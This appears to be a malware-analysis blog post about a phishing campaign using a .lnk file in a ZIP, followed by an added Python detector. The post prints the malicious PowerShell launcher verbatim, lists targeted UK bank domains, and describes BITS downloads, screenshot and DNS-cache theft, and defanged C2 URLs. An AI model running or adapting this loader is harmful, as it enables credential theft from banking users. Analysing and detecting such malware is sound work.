A lot of effort has gone into this infection attempt.
First, stolen information (the recipient's full name, address and telephone number) appears in the initial inbound e-mail to the victim.
When you click the link it hops through (not even sure how they allow this!) a McAfee reputation service domain, which forwards you on to the malware domain.
The above page then provides you with a ZIP file that changes slightly each time (it contains a different image file in the ZIP along with a Windows .lnk file).
“order-complete-details.zip” containing “order-complete-details.lnk”.
The .lnk file, when clicked, runs:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c $j="powershell -win hidden -c findstr /s dopretane $env:userprofile\*.lnk > $env:userprofile\Downloads\sent"."ps1; & $env:userprofile\Downloads\sent"."ps1"; start-process $j
This is some fairly clever code: it searches the entire user folder for the malicious .lnk file and extracts a PowerShell script embedded at the end of the .lnk.
Ignoring all the obfuscation the script essentially downloads another script from
However, this server will only send you a file if you download it using the BITS service built into Windows. If you request it with a browser you get an error message, and the server then stops responding to any further requests.
Upon successful download from the URL, your computer is given another PowerShell script. This one then requests further URLs using BITS.
It then runs ConvertTo-SecureString on the files and stores them as config.ini and web.ini.
When these files are run they fetch further files:
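As an added defender-side example (not code from the post or from the malware): a small Python check that turns the behaviour described above (execution-policy bypass, hidden window, a findstr sweep across *.lnk files, output carved into a .ps1 and run, downloads via BITS) into indicators and scores constructed process-creation records. The record format (time|user|image|commandline), the timestamps and user names are assumptions; the first record reuses the .lnk command line quoted in the post.

```python
import re
from typing import List

# Indicators taken from the .lnk command line and BITS behaviour described in the post.
# Patterns run over a normalised command line (quotes stripped, whitespace collapsed,
# lower-cased) so that quote-splitting such as sent"."ps1 does not defeat the match.
INDICATORS = {
    "exec_policy_bypass": re.compile(r"-e[a-z]*\s+bypass"),                # -ep / -ExecutionPolicy Bypass
    "hidden_window":      re.compile(r"-w[a-z]*\s+hidden"),                # -win / -WindowStyle Hidden
    "findstr_lnk_sweep":  re.compile(r"findstr\s+/s\s+\S+\s+\S*\*\.lnk"),  # marker search across *.lnk
    "redirect_to_ps1":    re.compile(r">\s*\S+\.ps1"),                     # carve output into a .ps1
    "invoke_ps1":         re.compile(r"&\s*\S+\.ps1"),                     # run the carved script
    "bits_transfer":      re.compile(r"bitsadmin|start-bitstransfer"),     # download via BITS
}


def normalise(cmd: str) -> str:
    cmd = cmd.replace('"', "").replace("'", "")
    return re.sub(r"\s+", " ", cmd).lower()


def classify(cmd: str) -> List[str]:
    """Return the names of all indicators present in one command line."""
    norm = normalise(cmd)
    return [name for name, pat in INDICATORS.items() if pat.search(norm)]


def scan_log(lines: List[str], threshold: int = 2) -> List[dict]:
    """Parse 'time|user|image|commandline' records (an assumed format) and return
    those whose command line matches at least `threshold` indicators."""
    hits = []
    for line in lines:
        parts = line.split("|", 3)
        if len(parts) != 4:
            continue  # malformed record; skip rather than abort the sweep
        ts, user, image, cmd = parts
        matched = classify(cmd)
        if len(matched) >= threshold:
            hits.append({"time": ts, "user": user, "image": image, "indicators": matched})
    return hits


# Constructed sample records; the first carries the .lnk command line quoted in the post.
SAMPLE_LOG = [
    r'2018-10-12T09:14:03|CORP\jsmith|powershell.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c $j="powershell -win hidden -c findstr /s dopretane $env:userprofile\*.lnk > $env:userprofile\Downloads\sent"."ps1; & $env:userprofile\Downloads\sent"."ps1"; start-process $j',
    r"2018-10-12T09:20:11|CORP\admin|powershell.exe|powershell.exe -Command Get-BitsTransfer -AllUsers",
    r"2018-10-12T09:25:40|CORP\build|powershell.exe|powershell.exe -ExecutionPolicy Bypass -File C:\build\run.ps1",
    "not a valid record",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["time"], hit["user"], ", ".join(hit["indicators"]))
```

A single indicator (an execution-policy bypass on a build host, say) is common and noisy, so the default threshold of two keeps the benign records out while the quoted command line trips five.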
A file containing just “sok” SHA256: ffa67ff84b797f1b99d6510d5f57e281ac0364228660497f2dac9a24b1b57cb8
A file of the same content as above.
It looks a bit like these are used as flags: if two “sok”s are returned the PowerShell script continues; if 60 seconds pass and two “sok”s have not been returned it seems to kill the PowerShell process and end execution.
The next step is enumeration of the mapped network drives on the system into a variable ($dd); it then parses the strings into something a bit like JSON in $outD.
Lots of UK bank names are then loaded into an array:
$b = @("intesasanpaolo","inbank","unicredit","nwolb.com","bankline","bankofscotland.co.uk","bankofscotland.co.uk","secure.lloydsbank.co.uk","secure.halifax-online.co.uk","hsbc.co.uk","rbsdigital.com","barclays.co.uk","onlinebusiness.lloydsbank","tsb.co.uk","retail.santander.co.uk","business.santander.co.uk","onlinebanking.nationwide.co.uk");
The script takes 4 screenshots 40 seconds apart and saves them as “ScreenCaptureX” where X is 0 through 3.
$tt is loaded with the list of running processes (.exe files that are currently running).
$dn is loaded with the cache of recent DNS hosts the computer has accessed (this will contain most websites, mail servers etc. that have been recently accessed).
All this information is then posted to one of the two hostnames contained within the previous request to hostp1.txt.
The request above also includes a variable named “bu” which indicates whether any of the above banking hostnames have appeared in the DNS cache, i.e. the attacker can collect data on which banks a specific infected machine has been visiting.
This URL then returns a command or “0”.
The command can be:
* Download a file and run it.
* Looks like an auto-update function for the malware.
* Update the host names that are used for command and control.
* Anything else with a length longer than 3 characters will delete all the screenshots and then initiate another download from the URL given in the HTTP response, then save and run it as a .exe file. Looks like a function to deploy further malware. ***SEE FURTHER BELOW REF1***
This command then also takes 6 more screenshots.
The next step, if none of the above are triggered, is to upload the screenshots that have been taken and then delete them from the disk, using the following URL on the command and control servers indicated in hostp1.txt
Logic is also written into the PowerShell script to check the BITS queue to make sure all pending uploads have completed before it moves on!
It then sleeps for 10 minutes and runs everything above again, in an infinite loop with 10-minute pauses.
If a banking URL is identified in the “bu” variable (for example *hsbc.co.uk) then I managed to trigger the response “hxxps://afrigat.eu/sload/dedem/faq.txt” (and “hxxps://qasarer.eu/sload/dedem/faq.txt”).
VirusTotal started to scan the file, then after a few results (some of which came up as SpyEyes or Ramnit (possibly part of the Zeus banking malware family?)) VirusTotal blanked the screen and came up with this unusual message.
However revisiting the page did return some results.
Some other indicators of this malware are “C:\necessi\Release\cheats.pdb” and “2b62a720-3ed1-47f8-bb98-d13fff48bc70”.
Someone else has done pretty much the same digging into this malware with an almost identical blog post ;)